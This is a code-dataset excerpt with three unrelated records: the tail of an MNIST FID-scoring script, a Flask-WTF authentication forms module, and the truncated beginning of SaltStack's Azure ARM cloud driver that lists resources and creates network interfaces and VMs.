fidScore = np.linalg.norm(mu1 - mu2) + np.trace(cov1 + cov2
- 2 * covSqrt)
return fidScore
def __call__(self, info):
(string1, img2, info1) = info
mu2 = img2.mean(axis=0)
cov2 = np.cov(np.transpose(img2))
score = self.fid(info1, (mu2, cov2))
# print("For alpha = " + string1 + " the FID value is " + str(score))
return score
def main():
version = int(ver)
subversion = int(subver)
trial_num = int(trial_n)
(trainIm, trainL), (_, _) = tf.keras.datasets.mnist.load_data()
trainIm = trainIm.reshape(trainIm.shape[0], 28, 28, 1).astype('float32')
trainIm = trainIm[np.random.choice(50000, 10000, replace=False), :, :, :]
trainIm = trainIm.reshape(10000, 28 * 28).astype('float32')
trainIm = trainIm / 255.0
print(trainIm.shape)
mu1 = trainIm.mean(axis=0)
trainIm = np.transpose(trainIm)
cov1 = np.cov(trainIm)
info1 = (mu1, cov1)
proc = Process()
pool = multiprocessing.Pool(processes=16)
while trial_num < trial_num + 1:
print(trial_num)
pFiles = []
for epoch in range(250):
p = np.load('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num)
+ '/predictions' + str(epoch) + '.npy')
p = p.reshape(p.shape[1], 28, 28, 1).astype('float32')
p = p[np.random.choice(50000, 10000, replace=False), :, :, :]
p = p.reshape(10000, 28 * 28).astype('float32')
p = (p * 127.5 + 127.5) / 255.0
if np.isnan(p).any():
break
pFiles.append(('sim_ann_epoch' + str(epoch), p, info1))
score_list = pool.map(proc, pFiles)
np.save('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num) + '/scores.npy', score_list)
print(score_list)
# If you are running low on space, uncomment the below code to automatically delete all
# predictions.npy files except for the one that has the lowest FID score.
#for epoch in range(250):
# if epoch != np.nanargmin(score_list):
# os.remove('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num)
# + '/predictions' + str(epoch) + '.npy')
trial_num = trial_num + 1
if __name__ == "__main__":
ver, subver, trial_n = input("Version, subversion, trial_num: ").split()
main()
| 38.934211
| 130
| 0.569111
|
124eee9c90a3aaedea34868b9f1219a0adb9bd5e
| 4,132
|
py
|
Python
|
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | 2
|
2018-09-07T02:39:37.000Z
|
2018-10-18T13:59:38.000Z
|
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | null | null | null |
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import Required, Length, Email, Regexp, EqualTo
from wtforms import ValidationError
from ..models import User
class LoginForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('Password', validators=[Required()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log In')
class RegistrationForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
username = StringField('Username', validators=[
Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
'Usernames must have only letters, '
'numbers, dots or underscores.')])
password = PasswordField('Password', validators=[
Required(), EqualTo('password2', message='Passwords must match.')])
password2 = PasswordField('Confirm password', validators=[Required()])
tel = StringField('Tel', validators=[
Required(), Regexp('^(?:^1[3456789]|^9[28])\d{9}$',
0,
'Bad telephone number, please try again.')])
bank_account = StringField('Bank account', validators=[
Required(), Regexp('^([\d]{4})([\d]{4})([\d]{4})([\d]{4})([\d]{0,})?$',
0,
'Bad bank account, please try again.')])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
raise ValidationError('Username already in use.')
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('Old password', validators=[Required()])
password = PasswordField('New password', validators=[
Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm new password', validators=[Required()])
submit = SubmitField('Update Password')
class PasswordResetRequestForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
submit = SubmitField('Reset Password')
class PasswordResetForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('New Password', validators=[
Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm password', validators=[Required()])
submit = SubmitField('Reset Password')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise ValidationError('Unknown email address.')
class ChangeEmailForm(FlaskForm):
email = StringField('New Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('Password', validators=[Required()])
submit = SubmitField('Update Email Address')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
class ChangeUserInfo(FlaskForm):
tel = StringField('New tel', validators=[
Required(), Regexp('^(?:^1[3456789]|^9[28])\d{9}$',
0,
'Bad telephone number, please try again.')])
bank_account = StringField('New bank account', validators=[
Required(), Regexp('^([\d]{4})([\d]{4})([\d]{4})([\d]{4})([\d]{0,})?$',
0,
'Bad bank account, please try again.')])
submit = SubmitField('commit')
| 44.430108
| 79
| 0.589061
|
c3086208c003d93c8ed11481f7f5708452f89d6f
| 68,582
|
py
|
Python
|
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Azure ARM Cloud Module
======================
.. versionadded:: 2016.11.0
.. versionchanged:: Fluorine
The Azure ARM cloud module is used to control access to Microsoft Azure Resource Manager
:depends:
* `azure <https://pypi.python.org/pypi/azure>`_ >= 2.0.0rc6
* `azure-common <https://pypi.python.org/pypi/azure-common>`_ >= 1.1.4
* `azure-mgmt <https://pypi.python.org/pypi/azure-mgmt>`_ >= 0.30.0rc6
* `azure-mgmt-compute <https://pypi.python.org/pypi/azure-mgmt-compute>`_ >= 0.33.0
* `azure-mgmt-network <https://pypi.python.org/pypi/azure-mgmt-network>`_ >= 0.30.0rc6
* `azure-mgmt-resource <https://pypi.python.org/pypi/azure-mgmt-resource>`_ >= 0.30.0
* `azure-mgmt-storage <https://pypi.python.org/pypi/azure-mgmt-storage>`_ >= 0.30.0rc6
* `azure-mgmt-web <https://pypi.python.org/pypi/azure-mgmt-web>`_ >= 0.30.0rc6
* `azure-storage <https://pypi.python.org/pypi/azure-storage>`_ >= 0.32.0
* `msrestazure <https://pypi.python.org/pypi/msrestazure>`_ >= 0.4.21
:configuration:
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud. Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
* HTTP base URL for a custom endpoint, such as Azure Stack. The ``/metadata/endpoints`` path will be added to the URL.
**userdata** and **userdata_file**:
Azure Resource Manager uses a separate VirtualMachineExtension object to pass userdata scripts to the virtual
machine. Arbitrary shell commands can be passed via the ``userdata`` parameter, or via a file local to the Salt
Cloud system using the ``userdata_file`` parameter. Note that the local file is not treated as a script by the
extension, so "one-liners" probably work best. If greater functionality is desired, a web-hosted script file can
be specified via ``userdata_file: https://raw.githubusercontent.com/account/repo/master/azure-script.py``, which
will be executed on the system after VM creation. For Windows systems, script files ending in ``.ps1`` will be
executed with ``powershell.exe``. The ``userdata`` parameter takes precedence over the ``userdata_file`` parameter
when creating the custom script extension.
**win_installer**:
This parameter, which holds the local path to the Salt Minion installer package, is used to determine if the
virtual machine type will be "Windows". Only set this parameter on profiles which install Windows operating systems.
Example ``/etc/salt/cloud.providers`` or
``/etc/salt/cloud.providers.d/azure.conf`` configuration:
.. code-block:: yaml
my-azure-config with username and password:
driver: azurearm
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
username: larry
password: 123pass
Or my-azure-config with service principal:
driver: azurearm
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
secret: XXXXXXXXXXXXXXXXXXXXXXXX
cloud_environment: AZURE_US_GOV_CLOUD
The Service Principal can be created with the new Azure CLI (https://github.com/Azure/azure-cli) with:
az ad sp create-for-rbac -n "http://<yourappname>" --role <role> --scopes <scope>
For example, this creates a service principal with 'owner' role for the whole subscription:
az ad sp create-for-rbac -n "http://mysaltapp" --role owner --scopes /subscriptions/3287abc8-f98a-c678-3bde-326766fd3617
*Note: review the details of Service Principals. Owner role is more than you normally need, and you can restrict
scope to a resource group or individual resources.
'''
# pylint: disable=wrong-import-position,wrong-import-order
from __future__ import absolute_import, print_function, unicode_literals
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool
import importlib
import logging
import os
import os.path
import pprint
import string
import time
# Salt libs
import salt.cache
import salt.config as config
import salt.loader
import salt.utils.cloud
import salt.utils.files
import salt.utils.stringutils
import salt.utils.yaml
import salt.ext.six as six
import salt.version
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudSystemExit,
SaltCloudExecutionFailure,
SaltCloudExecutionTimeout,
)
# Import 3rd-party libs
HAS_LIBS = False
try:
import azure.mgmt.compute.models as compute_models
import azure.mgmt.network.models as network_models
from azure.storage.blob.blockblobservice import BlockBlobService
from msrestazure.azure_exceptions import CloudError
HAS_LIBS = True
except ImportError:
pass
__virtualname__ = 'azurearm'
log = logging.getLogger(__name__)
def __virtual__():
'''
Check for Azure configurations.
'''
if get_configured_provider() is False:
return False
if get_dependencies() is False:
return (
False,
'The following dependencies are required to use the AzureARM driver: '
'Microsoft Azure SDK for Python >= 2.0rc6, '
'Microsoft Azure Storage SDK for Python >= 0.32, '
'MS REST Azure (msrestazure) >= 0.4'
)
return __virtualname__
def get_api_versions(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Get a resource type api versions
'''
if kwargs is None:
kwargs = {}
if 'resource_provider' not in kwargs:
raise SaltCloudSystemExit(
'A resource_provider must be specified'
)
if 'resource_type' not in kwargs:
raise SaltCloudSystemExit(
'A resource_type must be specified'
)
api_versions = []
try:
resconn = get_conn(client_type='resource')
provider_query = resconn.providers.get(
resource_provider_namespace=kwargs['resource_provider']
)
for resource in provider_query.resource_types:
if six.text_type(resource.resource_type) == kwargs['resource_type']:
resource_dict = resource.as_dict()
api_versions = resource_dict['api_versions']
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
return api_versions
def get_resource_by_id(resource_id, api_version, extract_value=None):
'''
Get an AzureARM resource by id
'''
ret = {}
try:
resconn = get_conn(client_type='resource')
resource_query = resconn.resources.get_by_id(
resource_id=resource_id,
api_version=api_version
)
resource_dict = resource_query.as_dict()
if extract_value is not None:
ret = resource_dict[extract_value]
else:
ret = resource_dict
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def get_configured_provider():
'''
Return the first configured provider instance.
'''
def __is_provider_configured(opts, provider, required_keys=()):
'''
Check if the provider is configured.
'''
if ':' in provider:
alias, driver = provider.split(':')
if alias not in opts['providers']:
return False
if driver not in opts['providers'][alias]:
return False
for key in required_keys:
if opts['providers'][alias][driver].get(key, None) is None:
return False
return opts['providers'][alias][driver]
for alias, drivers in six.iteritems(opts['providers']):
for driver, provider_details in six.iteritems(drivers):
if driver != provider:
continue
skip_provider = False
for key in required_keys:
if provider_details.get(key, None) is None:
# This provider does not include all necessary keys,
# continue to next one.
skip_provider = True
break
if skip_provider:
continue
return provider_details
return False
provider = __is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('subscription_id', 'tenant', 'client_id', 'secret')
)
if provider is False:
provider = __is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('subscription_id', 'username', 'password')
)
return provider
def get_dependencies():
'''
Warn if dependencies aren't met.
'''
return config.check_driver_dependencies(
__virtualname__,
{'azurearm': HAS_LIBS}
)
def get_conn(client_type):
'''
Return a connection object for a client type.
'''
conn_kwargs = {}
conn_kwargs['subscription_id'] = salt.utils.stringutils.to_str(
config.get_cloud_config_value(
'subscription_id',
get_configured_provider(), __opts__, search_global=False
)
)
cloud_env = config.get_cloud_config_value(
'cloud_environment',
get_configured_provider(), __opts__, search_global=False
)
if cloud_env is not None:
conn_kwargs['cloud_environment'] = cloud_env
tenant = config.get_cloud_config_value(
'tenant',
get_configured_provider(), __opts__, search_global=False
)
if tenant is not None:
client_id = config.get_cloud_config_value(
'client_id',
get_configured_provider(), __opts__, search_global=False
)
secret = config.get_cloud_config_value(
'secret',
get_configured_provider(), __opts__, search_global=False
)
conn_kwargs.update({'client_id': client_id, 'secret': secret,
'tenant': tenant})
else:
username = config.get_cloud_config_value(
'username',
get_configured_provider(), __opts__, search_global=False
)
password = config.get_cloud_config_value(
'password',
get_configured_provider(), __opts__, search_global=False
)
conn_kwargs.update({'username': username, 'password': password})
client = __utils__['azurearm.get_client'](
client_type=client_type, **conn_kwargs
)
return client
def get_location(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Return the location that is configured for this provider
'''
if not kwargs:
kwargs = {}
vm_dict = get_configured_provider()
vm_dict.update(kwargs)
return config.get_cloud_config_value(
'location',
vm_dict, __opts__, search_global=False
)
def avail_locations(call=None):
'''
Return a dict of all available regions.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_locations function must be called with '
'-f or --function, or with the --list-locations option'
)
ret = {}
ret['locations'] = []
try:
resconn = get_conn(client_type='resource')
provider_query = resconn.providers.get(
resource_provider_namespace='Microsoft.Compute'
)
locations = []
for resource in provider_query.resource_types:
if six.text_type(resource.resource_type) == 'virtualMachines':
resource_dict = resource.as_dict()
locations = resource_dict['locations']
for location in locations:
lowercase = location.lower().replace(' ', '')
ret['locations'].append(lowercase)
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def avail_images(call=None):
'''
Return a dict of all available images on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_images function must be called with '
'-f or --function, or with the --list-images option'
)
compconn = get_conn(client_type='compute')
region = get_location()
publishers = []
ret = {}
def _get_publisher_images(publisher):
'''
Get all images from a specific publisher
'''
data = {}
try:
offers = compconn.virtual_machine_images.list_offers(
location=region,
publisher_name=publisher,
)
for offer_obj in offers:
offer = offer_obj.as_dict()
skus = compconn.virtual_machine_images.list_skus(
location=region,
publisher_name=publisher,
offer=offer['name'],
)
for sku_obj in skus:
sku = sku_obj.as_dict()
results = compconn.virtual_machine_images.list(
location=region,
publisher_name=publisher,
offer=offer['name'],
skus=sku['name'],
)
for version_obj in results:
version = version_obj.as_dict()
name = '|'.join((
publisher,
offer['name'],
sku['name'],
version['name'],
))
data[name] = {
'publisher': publisher,
'offer': offer['name'],
'sku': sku['name'],
'version': version['name'],
}
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
data = {publisher: exc.message}
return data
try:
publishers_query = compconn.virtual_machine_images.list_publishers(
location=region
)
for publisher_obj in publishers_query:
publisher = publisher_obj.as_dict()
publishers.append(publisher['name'])
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
pool = ThreadPool(cpu_count() * 6)
results = pool.map_async(_get_publisher_images, publishers)
results.wait()
ret = {k: v for result in results.get() for k, v in six.iteritems(result)}
return ret
def avail_sizes(call=None):
'''
Return a list of sizes available from the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function, or with the --list-sizes option'
)
compconn = get_conn(client_type='compute')
ret = {}
location = get_location()
try:
sizes = compconn.virtual_machine_sizes.list(
location=location
)
for size_obj in sizes:
size = size_obj.as_dict()
ret[size['name']] = size
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
ret = {'Error': exc.message}
return ret
def list_nodes(call=None):
'''
List VMs on this Azure account
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes function must be called with -f or --function.'
)
ret = {}
nodes = list_nodes_full()
for node in nodes:
ret[node] = {'name': node}
for prop in ('id', 'image', 'size', 'state', 'private_ips', 'public_ips'):
ret[node][prop] = nodes[node].get(prop)
return ret
def list_nodes_full(call=None):
'''
List all VMs on the subscription with full information
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes_full function must be called with -f or --function.'
)
netapi_versions = get_api_versions(kwargs={
'resource_provider': 'Microsoft.Network',
'resource_type': 'networkInterfaces'
}
)
netapi_version = netapi_versions[0]
compconn = get_conn(client_type='compute')
ret = {}
def _get_node_info(node):
'''
Get node info.
'''
node_ret = {}
node['id'] = node['vm_id']
node['size'] = node['hardware_profile']['vm_size']
node['state'] = node['provisioning_state']
node['public_ips'] = []
node['private_ips'] = []
node_ret[node['name']] = node
try:
image_ref = node['storage_profile']['image_reference']
node['image'] = '|'.join([
image_ref['publisher'],
image_ref['offer'],
image_ref['sku'],
image_ref['version'],
])
except (TypeError, KeyError):
try:
node['image'] = node['storage_profile']['os_disk']['image']['uri']
except (TypeError, KeyError):
node['image'] = node.get('storage_profile', {}).get('image_reference', {}).get('id')
try:
netifaces = node['network_profile']['network_interfaces']
for index, netiface in enumerate(netifaces):
netiface_name = get_resource_by_id(
netiface['id'],
netapi_version,
'name'
)
netiface, pubips, privips = _get_network_interface(
netiface_name,
node['resource_group']
)
node['network_profile']['network_interfaces'][index].update(netiface)
node['public_ips'].extend(pubips)
node['private_ips'].extend(privips)
except Exception:
pass
node_ret[node['name']] = node
return node_ret
for group in list_resource_groups():
nodes = []
nodes_query = compconn.virtual_machines.list(
resource_group_name=group
)
for node_obj in nodes_query:
node = node_obj.as_dict()
node['resource_group'] = group
nodes.append(node)
pool = ThreadPool(cpu_count() * 6)
results = pool.map_async(_get_node_info, nodes)
results.wait()
group_ret = {k: v for result in results.get() for k, v in six.iteritems(result)}
ret.update(group_ret)
return ret
def list_resource_groups(call=None):
'''
List resource groups associated with the subscription
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_hosted_services function must be called with '
'-f or --function'
)
resconn = get_conn(client_type='resource')
ret = {}
try:
groups = resconn.resource_groups.list()
for group_obj in groups:
group = group_obj.as_dict()
ret[group['name']] = group
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def show_instance(name, call=None):
'''
Show the details from AzureARM concerning an instance
'''
if call != 'action':
raise SaltCloudSystemExit(
'The show_instance action must be called with -a or --action.'
)
try:
node = list_nodes_full('function')[name]
except KeyError:
log.debug('Failed to get data for node \'%s\'', name)
node = {}
__utils__['cloud.cache_node'](node, __active_provider_name__, __opts__)
return node
def delete_interface(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a network interface.
'''
if kwargs is None:
kwargs = {}
netconn = get_conn(client_type='network')
if kwargs.get('resource_group') is None:
kwargs['resource_group'] = config.get_cloud_config_value(
'resource_group', {}, __opts__, search_global=True
)
ips = []
iface = netconn.network_interfaces.get(
kwargs['resource_group'],
kwargs['iface_name'],
)
iface_name = iface.name
for ip_ in iface.ip_configurations:
ips.append(ip_.name)
poller = netconn.network_interfaces.delete(
kwargs['resource_group'],
kwargs['iface_name'],
)
poller.wait()
for ip_ in ips:
poller = netconn.public_ip_addresses.delete(kwargs['resource_group'], ip_)
poller.wait()
return {iface_name: ips}
def _get_public_ip(name, resource_group):
'''
Get the public ip address details by name.
'''
netconn = get_conn(client_type='network')
try:
pubip_query = netconn.public_ip_addresses.get(
resource_group_name=resource_group,
public_ip_address_name=name
)
pubip = pubip_query.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('network', exc.message)
pubip = {'error': exc.message}
return pubip
def _get_network_interface(name, resource_group):
'''
Get a network interface.
'''
public_ips = []
private_ips = []
netapi_versions = get_api_versions(kwargs={
'resource_provider': 'Microsoft.Network',
'resource_type': 'publicIPAddresses'
}
)
netapi_version = netapi_versions[0]
netconn = get_conn(client_type='network')
netiface_query = netconn.network_interfaces.get(
resource_group_name=resource_group,
network_interface_name=name
)
netiface = netiface_query.as_dict()
for index, ip_config in enumerate(netiface['ip_configurations']):
if ip_config.get('private_ip_address') is not None:
private_ips.append(ip_config['private_ip_address'])
if 'id' in ip_config.get('public_ip_address', {}):
public_ip_name = get_resource_by_id(
ip_config['public_ip_address']['id'],
netapi_version,
'name'
)
public_ip = _get_public_ip(public_ip_name, resource_group)
public_ips.append(public_ip['ip_address'])
netiface['ip_configurations'][index]['public_ip_address'].update(public_ip)
return netiface, public_ips, private_ips
def create_network_interface(call=None, kwargs=None):
'''
Create a network interface.
'''
if call != 'action':
raise SaltCloudSystemExit(
'The create_network_interface action must be called with -a or --action.'
)
# pylint: disable=invalid-name
IPAllocationMethod = getattr(
network_models,
'IPAllocationMethod'
)
# pylint: disable=invalid-name
NetworkInterface = getattr(
network_models,
'NetworkInterface'
)
# pylint: disable=invalid-name
NetworkInterfaceIPConfiguration = getattr(
network_models,
'NetworkInterfaceIPConfiguration'
)
# pylint: disable=invalid-name
PublicIPAddress = getattr(
network_models,
'PublicIPAddress'
)
if not isinstance(kwargs, dict):
kwargs = {}
vm_ = kwargs
netconn = get_conn(client_type='network')
if kwargs.get('location') is None:
kwargs['location'] = get_location()
if kwargs.get('network') is None:
kwargs['network'] = config.get_cloud_config_value(
'network', vm_, __opts__, search_global=False
)
if kwargs.get('subnet') is None:
kwargs['subnet'] = config.get_cloud_config_value(
'subnet', vm_, __opts__, search_global=False
)
if kwargs.get('network_resource_group') is None:
kwargs['network_resource_group'] = config.get_cloud_config_value(
'resource_group', vm_, __opts__, search_global=False
)
if kwargs.get('iface_name') is None:
kwargs['iface_name'] = '{0}-iface0'.format(vm_['name'])
try:
subnet_obj = netconn.subnets.get(
resource_group_name=kwargs['network_resource_group'],
virtual_network_name=kwargs['network'],
subnet_name=kwargs['subnet'],
)
except CloudError as exc:
raise SaltCloudSystemExit(
'{0} (Resource Group: "{1}", VNET: "{2}", Subnet: "{3}")'.format(
exc.message,
kwargs['network_resource_group'],
kwargs['network'],
kwargs['subnet']
)
)
ip_kwargs = {}
ip_configurations = None
if 'load_balancer_backend_address_pools' in kwargs:
pool_dicts = kwargs['load_balancer_backend_address_pools']
if isinstance(pool_dicts, dict):
pool_ids = []
for load_bal, be_pools in pool_dicts.items():
for pool in be_pools:
try:
lbbep_data = netconn.load_balancer_backend_address_pools.get(
kwargs['resource_group'],
load_bal,
pool,
)
pool_ids.append({'id': lbbep_data.as_dict()['id']})
except CloudError as exc:
log.error('There was a cloud error: %s', six.text_type(exc))
except KeyError as exc:
log.error('There was an error getting the Backend Pool ID: %s', six.text_type(exc))
ip_kwargs['load_balancer_backend_address_pools'] = pool_ids
if 'private_ip_address' in kwargs.keys():
ip_kwargs['private_ip_address'] = kwargs['private_ip_address']
ip_kwargs['private_ip_allocation_method'] = IPAllocationMethod.static
else:
ip_kwargs['private_ip_allocation_method'] = IPAllocationMethod.dynamic
if kwargs.get('allocate_public_ip') is True:
pub_ip_name = '{0}-ip'.format(kwargs['iface_name'])
poller = netconn.public_ip_addresses.create_or_update(
resource_group_name=kwargs['resource_group'],
public_ip_address_name=pub_ip_name,
parameters=PublicIPAddress(
location=kwargs['location'],
public_ip_allocation_method=IPAllocationMethod.static,
),
)
count = 0
poller.wait()
while True:
try:
pub_ip_data = netconn.public_ip_addresses.get(
kwargs['resource_group'],
pub_ip_name,
)
if pub_ip_data.ip_address: # pylint: disable=no-member
ip_kwargs['public_ip_address'] = PublicIPAddress(
six.text_type(pub_ip_data.id), # pylint: disable=no-member
)
ip_configurations = [
NetworkInterfaceIPConfiguration(
name='{0}-ip'.format(kwargs['iface_name']),
subnet=subnet_obj,
**ip_kwargs
)
]
break
except CloudError as exc:
log.error('There was a cloud error: {0}'.format(exc))
count += 1
if count > 120:
raise ValueError('Timed out waiting for public IP Address.')
time.sleep(5)
else:
priv_ip_name = '{0}-ip'.format(kwargs['iface_name'])
ip_configurations = [
NetworkInterfaceIPConfiguration(
name=priv_ip_name,
subnet=subnet_obj,
**ip_kwargs
)
]
network_security_group = None
if kwargs.get('security_group') is not None:
network_security_group = netconn.network_security_groups.get(
resource_group_name=kwargs['resource_group'],
network_security_group_name=kwargs['security_group'],
)
iface_params = NetworkInterface(
location=kwargs['location'],
network_security_group=network_security_group,
ip_configurations=ip_configurations,
)
poller = netconn.network_interfaces.create_or_update(
kwargs['resource_group'], kwargs['iface_name'], iface_params
)
try:
poller.wait()
except Exception as exc:
log.warning('Network interface creation could not be polled. '
'It is likely that we are reusing an existing interface. (%s)', exc)
count = 0
while True:
try:
return _get_network_interface(kwargs['iface_name'], kwargs['resource_group'])
except CloudError:
count += 1
if count > 120:
raise ValueError('Timed out waiting for operation to complete.')
time.sleep(5)
def request_instance(vm_):
'''
Request a VM from Azure.
'''
compconn = get_conn(client_type='compute')
# pylint: disable=invalid-name
CachingTypes = getattr(
compute_models, 'CachingTypes'
)
# pylint: disable=invalid-name
DataDisk = getattr(
compute_models, 'DataDisk'
)
# pylint: disable=invalid-name
DiskCreateOptionTypes = getattr(
compute_models, 'DiskCreateOptionTypes'
)
# pylint: disable=invalid-name
HardwareProfile = getattr(
compute_models, 'HardwareProfile'
)
# pylint: disable=invalid-name
ImageReference = getattr(
compute_models, 'ImageReference'
)
# pylint: disable=invalid-name
LinuxConfiguration = getattr(
compute_models, 'LinuxConfiguration'
)
# pylint: disable=invalid-name
SshConfiguration = getattr(
compute_models, 'SshConfiguration'
)
# pylint: disable=invalid-name
SshPublicKey = getattr(
compute_models, 'SshPublicKey'
)
# pylint: disable=invalid-name
NetworkInterfaceReference = getattr(
compute_models, 'NetworkInterfaceReference'
)
# pylint: disable=invalid-name
NetworkProfile = getattr(
compute_models, 'NetworkProfile'
)
# pylint: disable=invalid-name
OSDisk = getattr(
compute_models, 'OSDisk'
)
# pylint: disable=invalid-name
OSProfile = getattr(
compute_models, 'OSProfile'
)
# pylint: disable=invalid-name
StorageProfile = getattr(
compute_models, 'StorageProfile'
)
# pylint: disable=invalid-name
VirtualHardDisk = getattr(
compute_models, 'VirtualHardDisk'
)
# pylint: disable=invalid-name
VirtualMachine = getattr(
compute_models, 'VirtualMachine'
)
# pylint: disable=invalid-name
VirtualMachineSizeTypes = getattr(
compute_models, 'VirtualMachineSizeTypes'
)
subscription_id = config.get_cloud_config_value(
'subscription_id',
get_configured_provider(), __opts__, search_global=False
)
if vm_.get('driver') is None:
vm_['driver'] = 'azurearm'
if vm_.get('location') is None:
vm_['location'] = get_location()
if vm_.get('resource_group') is None:
vm_['resource_group'] = config.get_cloud_config_value(
'resource_group', vm_, __opts__, search_global=True
)
if vm_.get('name') is None:
vm_['name'] = config.get_cloud_config_value(
'name', vm_, __opts__, search_global=True
)
# pylint: disable=unused-variable
iface_data, public_ips, private_ips = create_network_interface(
call='action',
kwargs=vm_
)
vm_['iface_id'] = iface_data['id']
disk_name = '{0}-vol0'.format(vm_['name'])
vm_username = config.get_cloud_config_value(
'ssh_username', vm_, __opts__, search_global=True,
default=config.get_cloud_config_value(
'win_username', vm_, __opts__, search_global=True
)
)
ssh_publickeyfile_contents = None
ssh_publickeyfile = config.get_cloud_config_value(
'ssh_publickeyfile',
vm_,
__opts__,
search_global=False,
default=None
)
if ssh_publickeyfile is not None:
try:
with salt.utils.files.fopen(ssh_publickeyfile, 'r') as spkc_:
ssh_publickeyfile_contents = spkc_.read()
except Exception as exc:
raise SaltCloudConfigError(
"Failed to read ssh publickey file '{0}': "
"{1}".format(ssh_publickeyfile,
exc.args[-1])
)
disable_password_authentication = config.get_cloud_config_value(
'disable_password_authentication',
vm_,
__opts__,
search_global=False,
default=False
)
vm_password = salt.utils.stringutils.to_str(
config.get_cloud_config_value(
'ssh_password', vm_, __opts__, search_global=True,
default=config.get_cloud_config_value(
'win_password', vm_, __opts__, search_global=True
)
)
)
os_kwargs = {}
win_installer = config.get_cloud_config_value(
'win_installer', vm_, __opts__, search_global=True
)
if not win_installer and ssh_publickeyfile_contents is not None:
sshpublickey = SshPublicKey(
key_data=ssh_publickeyfile_contents,
path='/home/{0}/.ssh/authorized_keys'.format(vm_username),
)
sshconfiguration = SshConfiguration(
public_keys=[sshpublickey],
)
linuxconfiguration = LinuxConfiguration(
disable_password_authentication=disable_password_authentication,
ssh=sshconfiguration,
)
os_kwargs['linux_configuration'] = linuxconfiguration
if win_installer or (vm_password is not None and not disable_password_authentication):
if not isinstance(vm_password, str):
raise SaltCloudSystemExit(
'The admin password must be a string.'
)
if len(vm_password) < 8 or len(vm_password) > 123:
raise SaltCloudSystemExit(
'The admin password must be between 8-123 characters long.'
)
complexity = 0
if any(char.isdigit() for char in vm_password):
complexity += 1
if any(char.isupper() for char in vm_password):
complexity += 1
if any(char.islower() for char in vm_password):
complexity += 1
if any(char in string.punctuation for char in vm_password):
complexity += 1
if complexity < 3:
raise SaltCloudSystemExit(
'The admin password must contain at least 3 of the following types: '
'upper, lower, digits, special characters'
)
os_kwargs['admin_password'] = vm_password
availability_set = config.get_cloud_config_value(
